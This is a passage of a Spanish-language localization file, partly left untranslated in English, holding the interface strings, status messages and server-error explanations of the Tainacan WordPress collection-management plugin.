relaci\u00f3n:","instruction_select_a_metadatum":"Selecciona un metadato","instruction_cover_page":"Buscar una p\u00e1gina para elegir.","instruction_type_search_users":"Buscar usuarios...","instruction_type_search_users_filter":"Buscar usuarios para filtrar...","instruction_type_search_metadata_filter":"Filtros de metadatos para filtrar...","instruction_type_search_filter_filter":"Filtros de b\u00fasqueda para filtrar...","instruction_type_search_roles_filter":"Buscar perfiles para filtrar...","instruction_select_a_parent_collection":"Selecciona una colecci\u00f3n padre.","instruction_select_collection_thumbnail":"Selecciona una imagen en miniatura para la colecci\u00f3n","instruction_select_item_thumbnail":"Selecciona una imagen en miniatura para el elemento","instruction_select_collection_header_image":"Selecciona una imagen de cabecera para la colecci\u00f3n","instruction_select_term_header_image":"Selecciona una imagen de cabecera para el t\u00e9rmino","instruction_select_files_to_attach_to_item":"Selecciona archivos para adjuntar al elemento ","instruction_select_document_file_for_item":"Selecciona un archivo de documento para el elemento","instruction_insert_url":"Inserta un URL","instruction_write_text":"Escribir texto","instruction_search":"Buscar","instruction_search_in_repository":"Buscar en el repositorio","instruction_select_a_target_collection":"Selecciona una colecci\u00f3n de destino.","instruction_select_a_mapper":"Seleccionar un asignador","instruction_select_an_importer_type":"Selecciona un importador de las opciones que aparecen a continuaci\u00f3n:","instruction_drop_file_or_click_to_upload":"Suelta tu archivo de fuente o haz clic aqu\u00ed para subirlo.","instruction_select_metadatum_type":"Selecciona un tipo de metadato","instruction_configure_new_metadatum":"Configurar un nuevo metadato","instruction_configure_the_metadatum":"Configurar el metadato","instruction_configure_new_metadata_section":"Configure new metadata section","instruction_configure_the_metadata_section":"Configure the metadata section","instruction_insert_mapper_metadatum_info":"Insertar la nueva informaci\u00f3n de metadatos del asignador","instruction_select_max_options_to_show":"Selecciona el n\u00famero m\u00e1ximo de opciones a mostrar","instruction_select_collection_fetch_items":"Selecciona una colecci\u00f3n para buscar los elementos","instruction_select_a_action":"Selecciona una acci\u00f3n","instruction_parent_term":"Escribe para buscar un t\u00e9rmino padre a elegir.","instruction_type_existing_item":"Teclea para a\u00f1adir un elemento existente... ","instruction_type_existing_term":"Escribe para a\u00f1adir un t\u00e9rmino existente...","instruction_select_an_exporter_type":"Selecciona un exportador de las opciones que aparecen a continuaci\u00f3n:","instruction_select_a_collection":"Selecciona una colecci\u00f3n","instruction_hover_a_filter_type_to_preview":"Pasa el cursor sobre un tipo de filtro para obtener una vista previa","instruction_never_show_message_again":"No vuelvas a mostrarme este mensaje novamente","instruction_click_or_drag_filter_create":"Haz clic o arrastra y suelta para crear un nuevo filtro","instruction_click_or_drag_metadatum_create":"Haz clic o arrastra y suelta para crear un nuevo metadato","instruction_drag_and_drop_filter_sort":"Arrastra y suelta para cambiar el orden de los filtros","instruction_drag_and_drop_metadatum_sort":"Arrastra y suelta para cambiar el orden de los metadatos","instruction_drag_and_drop_metadata_sections_sort":"Drag and drop to change metadata sections order","instruction_select_a_date":"Selecciona una fecha","instruction_select_a_month":"Selecciona un mes","label_next_month":"Next month","label_previous_month":"Previous month","instruction_type_value_year":"Escribe un valor de a\u00f1o","instruction_select_the_amount_of_copies":"Selecciona la cantidad de copias del elemento que quieres crear","instruction_select_a_interval":"Selecciona un intervalo","instruction_select_title_mapping":"Antes de ejecutar la importaci\u00f3n, piensa en seleccionar los metadatos del origen del t\u00edtulo","instruction_click_error_to_go_to_metadata":"Haz clic en el error para ir a los metadatos:","instruction_click_to_see_or_search":"Haz clic para ver opciones o escribe para buscar...","instruction_select_one_or_more_collections":"Selecciona una o varias colecciones","instruction_thumbnail_alt":"Escribe aqu\u00ed un texto descriptivo para la miniatura de la imagen...","instruction_click_to_see_%s_child_terms":"Haz clic para ver los t\u00e9rminos hijos %s","instruction_click_to_see_%s_child_term":"Haz clic para ver el t\u00e9rmino hijo %s","instruction_click_to_load_filter":"Click to load the filter","instruction_collection_description":"Enter the collection description here...","instruction_collection_name":"Enter the collection name here...","instruction_click_to_easily_see":"Click to easily see","instruction_create_item_select_status":"Select a status for the item visiblity on the site. Remember, whichever you select will still be restricted by the collection status as well.","instruction_edit_item_status":"To alter the item status, select a different update strategy in the footer below.","instruction_press_enter_to_search_for":"Press \u003Ckbd\u003EENTER\u003C/kbd\u003E to search for","instruction_type_geocoordinate":"Type a geo coordinate in the form of lat,lng","instruction_click_to_add_a_point":"Drag to reposition or click to insert a marker","instruction_select_geocoordinate_metadatum":"Select a geocoordinate metadatum","instruction_multiple_terms_insertion":"Type or paste here a list of names using a separator to create multiple terms at once.","instruction_select_second_date_to_compare":"Select the second date metadatum","instruction_select_second_numeric_to_compare":"Select the second numeric metadatum","instruction_create_item_before_change_author":"Please create the item first before changing its author.","instruction_create_item_before_change_slug":"Please create the item first before changing its slug.","instruction_create_item_before_change_status":"Please create the item first to define its status.","instruction_filter_processes_date":"Select the date range for the processes","instruction_go_to_metadata_mapping_%s":"To use a mapping standard, you must first configure it in the \u003Ca href=\"%s\" target=\"_blank\"\u003Ecollection metadata mapping screen\u003C/a\u003E.","instruction_2_or_more":"2 or more","instruction_click_to_load_filter_%s":"Click to load the filter \"%s\"","info_items_tab_all":"Todos los elementos, excepto los movidos a la papelera.","info_items_tab_publish":"Solo los elementos que son visibles para todos.","info_items_tab_private":"Elementos visibles solo para los editores.","info_items_tab_draft":"Elementos en borrador, no publicados.","info_items_tab_pending":"Pending items, not published.","info_items_tab_trash":"Elementos que se han enviado a la papelera.","info_collections_tab_all":"Todas las colecciones publicadas, incluidas las visibles solo para los editores.","info_collections_tab_publish":"Solo las colecciones que son visibles para todos.","info_collections_tab_private":"Colecciones visibles s\u00f3lo para los editores.","info_collections_tab_draft":"Colecciones en borrador, no publicadas.","info_collections_tab_pending":"Pending collections, not published.","info_collections_tab_trash":"Colecciones que se han enviado a la papelera.","info_taxonomies_tab_all":"Todas las taxonom\u00edas, excepto las movidas a la papelera.","info_taxonomies_tab_publish":"Solo las taxonom\u00edas que son visibles para todos.","info_taxonomies_tab_private":"Taxonom\u00edas visibles s\u00f3lo para los editores.","info_taxonomies_tab_draft":"Taxonom\u00edas en borrador, no publicadas.","info_taxonomies_tab_pending":"Pending taxonomies, not published.","info_taxonomies_tab_trash":"Taxonom\u00edas que se han enviado a la papelera.","info_error_invalid_date":"Fecha no v\u00e1lida","info_search_results":"Resultados de b\u00fasqueda avanzada","info_search_criteria":"Criterios de b\u00fasqueda avanzada","info_name_is_required":"El nombre es obligatorio.","info_no_collection_created":"No se ha creado ninguna colecci\u00f3n en este repositorio.","info_no_items_publish":"No se han encontrado elementos p\u00fablicos.","info_no_items_private":"No se han encontrado elementos privados.","info_no_items_draft":"No se ha encontrado ning\u00fan elemento de borrador.","info_no_items_trash":"No se han encontrado elementos en la papelera.","info_no_items_pending":"No pending items found.","info_no_collections_publish":"No se han encontrado colecciones p\u00fablicas.","info_no_collections_private":"No se han encontrado colecciones privadas.","info_no_collections_draft":"No se han encontrado borradores de colecciones.","info_no_collections_pending":"No pending collections found.","info_no_collections_trash":"No se han encontrado colecciones en la papelera.","info_no_taxonomies_publish":"No se han encontrado taxonom\u00edas p\u00fablicas.","info_no_taxonomies_private":"No se han encontrado taxonom\u00edas privadas.","info_no_taxonomies_draft":"No se ha encontrado ning\u00fan borrador de taxonom\u00eda.","info_no_taxonomies_pending":"No pending taxonomies found.","info_no_taxonomies_trash":"No se han encontrado taxonom\u00edas en la papelera.","info_item_publish":"This item is published as public and will be visible to any visitor on the website, as long as its collection is also public.","info_item_private":"This item is published as private and will be visible only for editors with the required capabilities.","info_item_pending":"This item is pending review and will be published only for editors with the required capabilities.","info_item_draft":"This item is a draft and will be visible only for editors with the required capabilities. Also, in this state, no validation for required metadata is performed.","info_item_trash":"This item is on trash and will not be visible outside of the admin panel.","info_no_taxonomy_created":"No se ha creado ninguna taxonom\u00eda en este repositorio.","info_no_terms_created_on_taxonomy":"No se ha creado ning\u00fan t\u00e9rmino para esta taxonom\u00eda.","info_no_terms_found":"No se ha encontrado ning\u00fan t\u00e9rmino aqu\u00ed","info_no_more_terms_found":"No se han encontrado m\u00e1s t\u00e9rminos","info_no_item_created":"Hasta ahora no se ha creado ning\u00fan elemento.","info_no_item_found_by_you":"No items authored by you were found.","info_no_page_found":"No se ha encontrado ninguna p\u00e1gina con este nombre.","info_no_user_found":"No se ha encontrado ning\u00fan usuario con este nombre.","info_no_item_found_filter":"No se ha encontrado ning\u00fan elemento con estos filtros.","info_no_item_found":"No se ha encontrado ning\u00fan elemento.","info_no_item_authored_by_you_found":"No item authored by you was found.","info_item_not_saved":"Advertencia: El elemento no se ha guardado.","info_no_associated_role":"Ning\u00fan perfil asociado.","info_error_deleting_collection":"Error al borrar la colecci\u00f3n.","info_error_deleting_taxonomy":"Error al borrar la taxonom\u00eda","info_error_first_value_greater":"El primer valor debe ser menor que el segundo","info_error_value_must_be_number":"El valor debe ser un n\u00famero","info_error_upload":"Error al subir los archivos.","info_collection_deleted":"Colecci\u00f3n borrada.","info_item_deleted":"Elemento borrado.","info_taxonomy_deleted":"Taxonom\u00eda borrada","info_warning_attachment_delete":"\u00bfRealmente quieres borrar este adjunto?","info_warning_collection_delete_%s":"Do you really want to permanently delete the collection \"%s\"?","info_warning_collection_trash_%s":"Do you really want to trash the collection \"%s\"?","info_warning_filter_delete_%s":"Do you really want to delete the filter \"%s\"?","info_warning_item_delete":"\u00bfRealmente quieres borrar este elemento de forma permanente?","info_warning_item_delete_%s":"Do you really want to permanently delete the item \"%s\"?","info_warning_remove_item_from_trash":"\u00bfRealmente quieres eliminar este elemento de la papelera?","info_warning_item_trash":"\u00bfRealmente quieres tirar este elemento a la papelera?","info_warning_item_trash_%s":"Do you really want to trash the item \"%s\"?","info_warning_metadatum_delete_%s":"Do you really want to permanently delete the metadatum \"%s\"?","info_warning_metadata_section_delete_%s":"Do you really want to permanently delete the metadata section \"%s\"?","info_warning_taxonomy_delete_%s":"Do you really want to delete the taxonomy \"%s\"?","info_warning_selected_collections_delete":"\u00bfRealmente quieres borrar permanentemente las colecciones seleccionadas?","info_warning_selected_collections_trash":"\u00bfRealmente deseas mover las colecciones seleccionadas para la papelera?","info_warning_selected_items_delete":"\u00bfRealmente quieres borrar permanentemente los elementos seleccionados?","info_warning_selected_items_trash":"\u00bfRealmente deseas mover los elementos seleccionados para la papelera?","info_warning_selected_taxonomies_delete":"\u00bfRealmente quieres borrar las taxonom\u00edas seleccionadas?","info_warning_collection_related":"Los metadatos de colecci\u00f3n relacionada son obligatorios","info_warning_no_metadata_found":"No se han encontrado metadatos en esta colecci\u00f3n ","info_no_capabilities_found":"No se ha encontrado ninguna capacidad.","info_no_role_associated_capability":"No hay ning\u00fan perfil asociado a esta capacidad","info_associated_roles":"Estos son los perfiles que tienen esta capacidad establecida. Puedes a\u00f1adir o eliminar la capacidad para personalizar el perfil.","info_inherited_roles":"Estos son los perfiles que tienen mayores capacidades, que heredan \u00e9sta. No se puede editar esto ya que no tendr\u00e1 precedencia sobre la capacidad mayor.","info_showing_items_range":"Mostrando elementos %1$s a %2$s de %3$s.","info_showing_attachments_range":"Showing attachments %1$s to %2$s of %3$s.","info_showing_%s_range":"Showing %1$s %2$s to %3$s of %4$s.","info_showing_collections_range":"Showing collections %1$s to %2$s of %3$s.","info_showing_taxonomies_range":"Showing taxonomies %1$s to %2$s of %3$s.","info_showing_activities_range":"Showing activities %1$s to %2$s of %3$s.","info_showing_processes_range":"Showing processes %1$s to %2$s of %3$s.","info_showing_capabilities_range":"Showing capabilities %1$s to %2$s of %3$s.","info_page_items_range":"Page %1$s (items %2$s to %3$s of %4$s)","info_warning_remove_from_trash_first":"Eliminar este elemento de la papelera primero","info_of":"de","info_created_by":"Creado por:","info_by":"Por:","info_date":"Fecha:","info_modification_date":"Fecha de la \u00faltima modificaci\u00f3n:","info_not_saved":"No se ha guardado","info_warning_item_not_saved":"\u00bfEst\u00e1s seguro? El elemento no se ha guardado, los cambios se perder\u00e1n.","info_warning_metadata_not_saved":"\u00bfEst\u00e1s seguro? Hay metadatos que no se han guardado, los cambios se perder\u00e1n.","info_warning_filters_not_saved":"\u00bfEst\u00e1s seguro? Hay filtros que no se han guardado, los cambios se perder\u00e1n.","info_no_description_provided":"No se ha proporcionado una descripci\u00f3n.","info_warning_taxonomy_not_saved":"\u00bfEst\u00e1s seguro? La taxonom\u00eda no se ha guardado, los cambios se perder\u00e1n.","info_warning_terms_not_saved":"\u00bfEst\u00e1s seguro? Hay t\u00e9rminos que no se han guardado, los cambios se perder\u00e1n.","info_no_activities":"No se han encontrado actividades.","info_logs_before":"Antes","info_logs_after":"Despu\u00e9s","info_there_is_no_metadatum":"A\u00fan no hay metadatos aqu\u00ed.","info_there_is_no_metadata_section":"There is no metadata section here yet.","info_there_is_no_filter":"A\u00fan no hay ning\u00fan filtro aqu\u00ed.","info_collection_filter_on_repository_level":"If there are filters set in the collections, you can also set them to be displayed at repository level.","info_changes":"Cambios","info_possible_external_sources":"Posibles fuentes externas: CSV, Instagram, YouTube, etc.","info_help_term_name":"Nombre del t\u00e9rmino","info_help_term_description":"Descripcion del t\u00e9rmino.","info_help_parent_term":"El t\u00e9rmino padre","info_no_attachments_on_item_yet":"Hasta el momento no hay adjuntos en este elemento.","info_no_%s_on_item_yet":"The are no %s on this item so far.","info_repository_metadata_inheritance":"Los metadatos del repositorio ser\u00e1n heredados por todas las colecciones.","info_repository_filters_inheritance":"Los filtros de repositorio ser\u00e1n heredados por todas las colecciones.","info_create_filters":"Haz clic o arrastra y suelta los tipos de metadatos aqu\u00ed para crear un nuevo filtro.","info_create_metadata":"Haz clic o arrastra y suelta los tipos de metadatos aqu\u00ed para crear un nuevo metadato.","info_create_section":"Click or Drag and Drop to create a new section for organizing your metadata list.","info_create_child_metadata":"Arrastra y suelta los tipos de metadatos aqu\u00ed para crear un metadato hijo.","info_choose_your_metadata":"Elige sus metadatos","info_target_collection_helper":"La colecci\u00f3n donde se a\u00f1adir\u00e1 el elemento importado. Solo las colecciones que tienes permisos ser\u00e1n listadas.","info_source_file_upload":"El archivo que contiene los datos a importar.","info_no_metadata_source_file":"No se han encontrado metadatos del archivo original.","info_no_special_fields_available":"No se ha encontrado ning\u00fan campo especial.","info_special_fields_mapped_default":"Asignado al campo por defecto en la colecci\u00f3n.","info_metadata_mapping_helper":"Asignar cada metadato de archivo con el correspondiente en la colecci\u00f3n seleccionada.","info_upload_a_source_to_see_metadata":"Sube un archivo de fuente externa para cargar los metadatos.","info_select_collection_to_list_metadata":"Selecciona una colecci\u00f3n de destino para enumerar sus metadatos.","info_url_source_link_helper":"Enlace para el archivo que contiene los datos que se van a importar.","info_updated_at":"Actualizado en","info_editing_metadata_values":"Editando los valores de los metadatos...","info_updating_metadata_values":"Actualizando los valores de los metadatos...","info_type_to_add_users":"A\u00f1adir usuarios para filtrar...","info_type_to_add_items":"A\u00f1adir elementos para filtrar...","info_type_to_search_items":"Buscar elementos","info_type_to_add_terms":"A\u00f1adir t\u00e9rminos para filtrar...","info_type_to_search_metadata":"Buscar metadatos..","info_type_to_add_metadata":"A\u00f1adir metadatos para filtrar...","info_visibility_helper":"Como el elemento estar\u00e1 disponible para la visualizaci\u00f3n.","info_errors_in_form":"Hay errores en el formulario","info_no_document_to_item":"No se ha subido ning\u00fan documento a este elemento.","info_unfinished_processes":"procesos no finalizados","info_no_process":"No hay procesos en ejecuci\u00f3n.","info_unknown_date":"Fecha desconocida.","info_there_are_no_metadata_to_search":"No hay metadatos para buscar","info_there_are_no_metadata_in_repository_level":"No hay metadatos en el nivel de repositorio","info_import_collection":"Importar de fuentes externas.","info_import_items":"Importar elementos de fuentes externas.","info_bulk_add_items":"A\u00f1ade elementos en lote desde los documentos de tu ordenador.","info_editing_items_in_bulk":"Edici\u00f3n en lotes de elementos","info_by_inner":"por","info_bulk_edit_process_added":"Edici\u00f3n en lotes a\u00f1adida a la fila de procesos.","info_no_parent_term_found":"No se ha encontrado ning\u00fan t\u00e9rmino padre v\u00e1lido con este nombre.","info_warning_changing_parent_term":"\u00a1Advertencia! Si se cambia el t\u00e9rmino padre, se recargar\u00e1 la lista de t\u00e9rminos, con lo que se anular\u00e1 cualquier selecci\u00f3n.","info_warning_selected_items_remove_from_trash":"\u00bfRealmente quieres eliminar de la papelera los elementos seleccionados?","info_no_options_available_filtering":"No hay opciones para estos filtros.","info_no_options_found":"No se han encontrado opciones.","info_all_files_uploaded":"Todos los archivos subidos.","info_there_are_%s_items_being_edited":"Hay %s elementos que se est\u00e1n editando.","info_there_is_one_item_being_edited":"Hay un elemento que se est\u00e1 editando.","info_no_preview_found":"No se ha encontrado ninguna vista previa.","info_leaving_bulk_edit":"Ahora est\u00e1s dejando la edici\u00f3n en lotes.","info_current_view_mode_metadata_not_allowed":"La visualizaci\u00f3n actual no permite la selecci\u00f3n de metadatos mostrados.","info_cant_select_metadata_without_items":"No se pueden seleccionar los metadatos mostrados sin elementos en la lista.","info_process_status_finished":"Finalizado","info_process_status_finished_errors":"Finalizado con errores","info_process_status_errored":"Ha fallado","info_process_status_cancelled":"Cancelado","info_process_status_paused":"En pausa","info_process_status_running":"En ejecuci\u00f3n","info_warning_process_delete":"\u00bfEst\u00e1s seguro? Este proceso se borrar\u00e1.","info_warning_process_cancelled":"\u00bfEst\u00e1s seguro? Este proceso se cancelar\u00e1.","info_empty":"vac\u00edo","info_url_copied":"Enlace URL copiado","info_other_options":"Otras opciones:","info_other_item_listing_options":"Otras opciones de cat\u00e1logo de elementos:","info_send_email":"El exportador puede tardar un poco. Marca esta opci\u00f3n para recibir un correo electr\u00f3nico cuando el proceso haya terminado. Tambi\u00e9n puedes comprobar el estado del proceso visitando la p\u00e1gina","info_tainacan_api":"API de Tainacan en formato JSON.","info_items_hidden_due_sorting":"Cuando se ordena por el valor de los metadatos, los elementos que no tienen ning\u00fan valor para los metadatos elegidos no aparecer\u00e1n en la lista. Esta lista puede tener menos elementos que el total existente para los criterios de b\u00fasqueda actuales.","info_sorting_by_metadata_value_%s":"Mostrando solo elementos que tienen valor para los metadatos %s.","info_sorting_by_metadata_value_%s_empty_list":"No se ha encontrado ning\u00fan elemento, pero solo se muestran los art\u00edculos con valores para el metadato %s. Intenta ordenar por otro metadato.","info_await_while_item_copy":"Por favor, espera mientras se crean las copias...","info_await_while_item_copies":"Por favor, espera mientras se crean las copias. Esto puede llevar un tiempo...","info_expose_only_displayed_metadata":"Al marcar esta opci\u00f3n, solo se mostrar\u00e1n los metadatos que aparecen en la lista actual","info_initial_value":"Valor inicial","info_final_value":"Valor final","info_show_interval_on_tag":"Mostrar intervalo aplicado en las etiquetas","info_title_mapping":"El t\u00edtulo es el metadato m\u00e1s relevante, que identificar\u00e1 tu elemento en las listas para los diferentes modos de visualizaci\u00f3n. Selecciona primero los metadatos de origen del t\u00edtulo, o salta para ejecutar el importador tal cual.","info_can_not_edit_collection":"No tienes permiso para editar esta colecci\u00f3n.","info_can_not_edit_taxonomy":"No tienes permiso para editar esta taxonom\u00eda.","info_can_not_edit_filters":"No tienes permiso para editar los filtros.","info_can_not_edit_metadata":"No tienes permiso para editar metadatos.","info_can_not_edit_capabilities":"No tienes permiso para editar las capacidades.","info_can_not_read_activities":"No tienes permiso para leer actividades.","info_can_not_edit_item":"No tienes permiso para editar este elemento.","info_can_not_bulk_edit_items_collection":"No tienes permiso para editar en lotes los elementos de esta colecci\u00f3n.","info_not_allowed_change_order_metadata":"Aqu\u00ed no se puede cambiar el orden de los metadatos.","info_not_allowed_change_order_metadata_sections":"Cannot change metadata sections order here.","info_not_allowed_change_order_filters":"Aqu\u00ed no se puede cambiar el orden de los filtros.","info_no_value_compound_metadata":"No se ha a\u00f1adido ning\u00fan valor a este metadato compuesto.","info_child_of":"hijo de ","info_children_of_%s":"Children of %s","info_slides_help_introduction":"Usa los siguientes comandos para navegar por los elementos","info_slides_previous_item":"Para ir al elemento anterior","info_slides_next_item":"Para ir al siguiente elemento","info_slides_hide_controls":"para ocultar los controles y centrarte en el documento","info_slides_start_transition":"para iniciar o pausar la transici\u00f3n autom\u00e1tica cada 3s","info_slides_exit":"Para salir del modo de visualizaci\u00f3n de diapositivas en pantalla completa","info_slides_help_end":"En cualquier momento, tambi\u00e9n puedes consultar la lista de metadatos del elemento haciendo clic en el icono del metadato (%1$s) o ir directamente a la p\u00e1gina del elemento, donde podr\u00e1s ver todos sus detalles, haciendo clic en el icono del ojo (%2$s).","info_thumbnail_custom":"Sube la imagen deseada para la miniatura","info_thumbnail_default_from_document":"Se generar\u00e1 autom\u00e1ticamente una miniatura a partir del archivo del documento enviado","info_submission_processing":"Por favor, espera mientras se procesa el env\u00edo","info_submission_uploading":"Por favor, espera mientras se suben las im\u00e1genes","info_thumbnail_alt":"El texto alternativo de la miniatura solo es visible por lectores de pantalla e deber\u00eda ser \u00fatil para los usuarios con discapacidad visual","info_edit_attachments":"Orden, t\u00edtulo o texto alternativo de los adjuntos se puede editar a trav\u00e9s del modal de multimedea de WordPress.","info_recaptcha_link_%s":"Remember to configure your website reCAPTCHA keys on \u003Ca href=\"%s\" target=\"_blank\"\u003Ethe plugin's settings page, at the item submission section.\u003C/a\u003E.","info_form_not_loaded":"Probablemente no hay suficientes permisos para mostrarlo aqu\u00ed.","info_validating_slug":"Validando slug...","info_no_taxonomy_metadata_created":"A\u00fan no se han creado metadatos de taxonom\u00eda","info_child_terms_chart":"Haz clic en la barra del t\u00e9rmino del gr\u00e1fico de al lado para ver sus t\u00e9rminos hijos (si los hay) en este panel","info_nothing_like_this_so_far":"Nothing like this so far.","info_metadata_autocomplete_suggestions":"Algunos valores ya se usan en este metadato:","info_related_items":"Estos son elementos que est\u00e1n relacionados con este elemento mediante sus propios metadatos de tipo relaci\u00f3n. Puedes editar esta relaci\u00f3n en sus p\u00e1ginas.","info_document_option_forced_iframe":"Intenta usar un iframe para incrustar contenido de una URL en la p\u00e1gina del elemento. Puedes usar esta opci\u00f3n si la incrustaci\u00f3n autom\u00e1tica no funciona.","info_document_option_is_image":"Si est\u00e1s enlazando directamente a una imagen externa, usa esta opci\u00f3n para que se pueda incrustar correctamente.","info_%s_applied_filters":"\u003Cstrong\u003E%s\u003C/strong\u003E filtros aplicados","info_items_%s_found":"\u003Cstrong\u003E%s\u003C/strong\u003E elementos encontrados","info_one_applied_filter":"\u003Cstrong\u003EOne\u003C/strong\u003E filter applied","info_item_one_found":"\u003Cstrong\u003EOne\u003C/strong\u003E item found","info_iframe_dimensions":"Los valores de las dimensiones se pasar\u00e1n al iframe, pero su presentaci\u00f3n puede cambiar seg\u00fan las opciones de visualizaci\u00f3n del tema. Es todav\u00eda importante mantener una relaci\u00f3n de aspecto aproximada con el contenido interior.","info_metadata_mapper_helper":"Selecciona los metadatos correspondientes para que se puedan exponer seg\u00fan el asignador","info_default_orderby":"Estas opciones solo afectan al estado inicial del orden de los elementos. Tras el cambio, el valor usado ser\u00e1 el \u00faltimo seleccionado por el usuario.","info_collection_thumbnail_and_header":"The thumbnail is a squared image that will represent the collection in listings. The header image is a complementary, decorative image that may or not be displayed by your theme in the items list. Keep in mind that it might be cropped.","info_preset_collections":"Use mappers or standards as pre configuration","info_create_collection_from_mapper":"Have the metadata preset by an installed mapper, such as Dublin core, then set the rest manually.","info_create_collection_from_preset":"Have metadata, taxonomies, terms and related collections preset according to a standard.","info_use_search_separated_words":"You may wrap the words with quotes to group them.","info_for_more_metadata_search_options_use":"For more options of metadata search, use the","info_you_searched_for_%s":"You searched for %s","info_try_enabling_search_by_word":"Try enabling the search by words.","info_try_disabling_search_by_word":"Try disabling the search by words, to search for the complete phrase.","info_try_empting_the_textual_search":"Try empting the textual search.","info_try_selecting_all_collections_in_filter":"Try selecting All Collections in the filter above.","info_details_about_search_by_word":"They may be located on different metadata and order, but you will still be able to use quotes to group them.","info_item_submission_draft_status":"Warning: draft items may be submitted even without filling all required metadata.","info_empty_geocoordinate_metadata_list":"No geocoordinate metadata was found. Try enabling it in the \"displayed metadata\" dropdown.","info_non_located_item":"This item does not have any location based on this metadata.","info_metadata_section_hidden_conditional":"Section disabled due to a conditional metadatum value.","info_create_select_metadatum_for_conditional_section":"For configuring conditional sections, first create one select type metadatum to use its values as rules for displaing this section. The metadatum should be inside another metadatum section.","info_taxonomy_terms_list":"The list of terms that are managed by this taxonomy. They will be used as values for the taxonomy metadata.","info_no_child_term_of_%s_found":"No child term of %s was found.","info_warning_term_with_child":"This term has child terms. Per default, if you remove a parent term, its child terms will be moved one level up in the hierarchy.","info_warning_selected_term_delete":"\u00bfRealmente quieres borrar permanentemente el t\u00e9rmino seleccionado?","info_warning_some_terms_with_child":"When removing multiple terms at once, it is possible that some of the terms contain child terms. Per default, if you remove a parent term, its child terms will be moved one level up in the hierarchy.","info_%s_terms_created":"%s terms created with success.","info_terms_creation_failed_due_to_value_%s":"Terms creation failed due to value: %s.","info_terms_creation_failed_due_to_values_%s":"Terms creation failed due to values: %s.","info_autodraft_updated":"Autodraft updated. Please create the item to keep your changes.","info_intersection_explainer":"Will show items if the selected value is:","info_intersection_rules":"The value must match both rules to appear in the filter.","info_editing_publication_authorship":"Warning! By changhing the item author, you may loose access to editing it. Certain types of users can only edit items that are authored by theirselves.","info_change_author_from_%s_to_%s":"Are you sure you want to change the authorship of this item from \u003Cem\u003E%1$s\u003C/em\u003E to \u003Cem\u003E%2$s\u003C/em\u003E?","info_authorship":"The user who is credited as creator of this item and who generally have capabilities to edit it, besides administrators.","info_comment_status":"Allow or disallow users to write comments in the item public page.","info_publication_data":"This section gathers information related to the item publication on the website.","info_publication_data_editing":"You may tweak some of the options available here in the collection settings.","info_sorting_%s_by_%s":"Sorting \u003Cem\u003E%1$s\u003C/em\u003E by \u003Cem\u003E%2$s\u003C/em\u003E.","info_manage_collections":"Manage which are available in the \u003Ca href=\"%s\" target=\"_blank\"\u003Ecollections list\u003C/a\u003E page.","info_manage_taxonomies":"Manage which are available in the \u003Ca href=\"%s\" target=\"_blank\"\u003Etaxonomies list\u003C/a\u003E page.","info_error_date_smaller_than_min_%s":"Date should be after %s.","info_error_date_greater_than_max_%s":"Date should be before %s.","action_update-metadata-value":"Actualizaci\u00f3n del valor de los metadatos del elemento","action_update":"Actualizaciones generales","action_create":"Creaciones generales","action_update-metadata-order":"Actualizaci\u00f3n del orden de los metadatos","action_trash":"Env\u00edos a la papelera","action_new-attachment":"Adici\u00f3n de archivos adjuntos","action_update-filters-order":"Actualizaci\u00f3n del orden de los filtros","action_update-document":"Actualizaci\u00f3n de documentos","action_delete":"Borrados generales","action_delete-attachment":"Borrado de adjuntos","action_update-thumbnail":"Actualizaci\u00f3n de miniaturas","action_others":"Otras acciones","datepicker_month_january":"Enero","datepicker_month_february":"Febrero","datepicker_month_march":"Marzo","datepicker_month_april":"Abril","datepicker_month_may":"Mayo","datepicker_month_june":"Junio","datepicker_month_july":"Julio","datepicker_month_august":"Agosto","datepicker_month_september":"Septiembre","datepicker_month_october":"Octubre","datepicker_month_november":"Noviembre","datepicker_month_december":"Diciembre","datepicker_short_sunday":"Do","datepicker_short_monday":"Lu","datepicker_short_tuesday":"Ma","datepicker_short_wednesday":"Mi","datepicker_short_thursday":"Ju","datepicker_short_friday":"Vi","datepicker_short_saturday":"Sa","error_connectivity_label":"Problema de conectividad","error_connectivity":"Es posible que est\u00e9s desconectado o que el servidor no funcione correctamente.","error_permalinks_label":"Permalinks issue","error_400":"Alguna solicitud sali\u00f3 mal debido a una sintaxis no v\u00e1lida.","error_401":"Tienes que identificarte para acceder a esta informaci\u00f3n. Intenta acceder de nuevo en el panel de administraci\u00f3n de WordPress.","error_403":"Parece que no tienes permiso para acceder a este contenido.","error_404":"Se ha realizado una solicitud err\u00f3nea o esta informaci\u00f3n no existe.","error_408":"Esta solicitud ha superado el tiempo de espera del servidor.","error_413":"This request size exceeded the server size limit","error_500":"Se ha producido un error interno del servidor. Intenta contactar con el administrador.","error_502":"La comunicaci\u00f3n entre los servidores ha ido mal. Intenta contactar con el administrador.","error_503":"Algunos servicios no est\u00e1n disponibles en este momento. Intenta de nuevo m\u00e1s tarde y, si persiste, ponte en contacto con el administrador.","error_504":"La comunicaci\u00f3n con el servidor ha superado el tiempo de espera previsto. Intenta contactar con el administrador.","error_511":"Tienes que identificarte para acceder a esta informaci\u00f3n. Intenta acceder de nuevo en el panel de administraci\u00f3n de WordPress.","error_other":"Algo sali\u00f3 mal aqu\u00ed. Puedes volver a intentarlo o ponerte en contacto con el administrador.","error_connectivity_detail":"La API Heartbeat de WordPress env\u00eda peri\u00f3dicamente solicitudes al servidor para actualizar algunas informaciones. La solicitud m\u00e1s reciente ha fallado por alguna raz\u00f3n. Podr\u00eda ser el caso de una p\u00e9rdida de conexi\u00f3n o una mala comunicaci\u00f3n entre el navegador y el servidor.","error_permalinks_detail":"Tainacan requires your Permalink settings to be configured. Please visit \u003Ca href=\"%s\" target=\"_blank\"\u003EPermalink settings\u003C/a\u003E and define it to an option such as \"postname\".","error_400_detail":"El servidor no ha podido entender la solicitud debido a una sintaxis no v\u00e1lida. Posiblemente, esto sea un problema con Tainacan y debe informarse a los desarrolladores.","error_401_detail":"Debes identificarte para acceder a esta informaci\u00f3n. Aunque tengas acceso al panel de administrador de Tainacan, puede ser que tus cookies de sesi\u00f3n se hayan perdido. Intenta recargar la p\u00e1gina o volver a iniciar sesi\u00f3n en el panel de administrador de WordPress.","error_403_detail":"Parece que no tienes permiso para acceder a este contenido. Puede que tu usuario tenga un perfil con capacidades insuficientes. Si ese no es el caso, comprueba si est\u00e1s conectado correctamente en el panel de administraci\u00f3n de WordPress.","error_404_detail":"Se ha realizado una solicitud incorrecta o esta informaci\u00f3n no existe. Esto podr\u00eda significar que se ha producido un error de conexi\u00f3n o que el contenido que buscas se ha solicitado de forma incorrecta. En 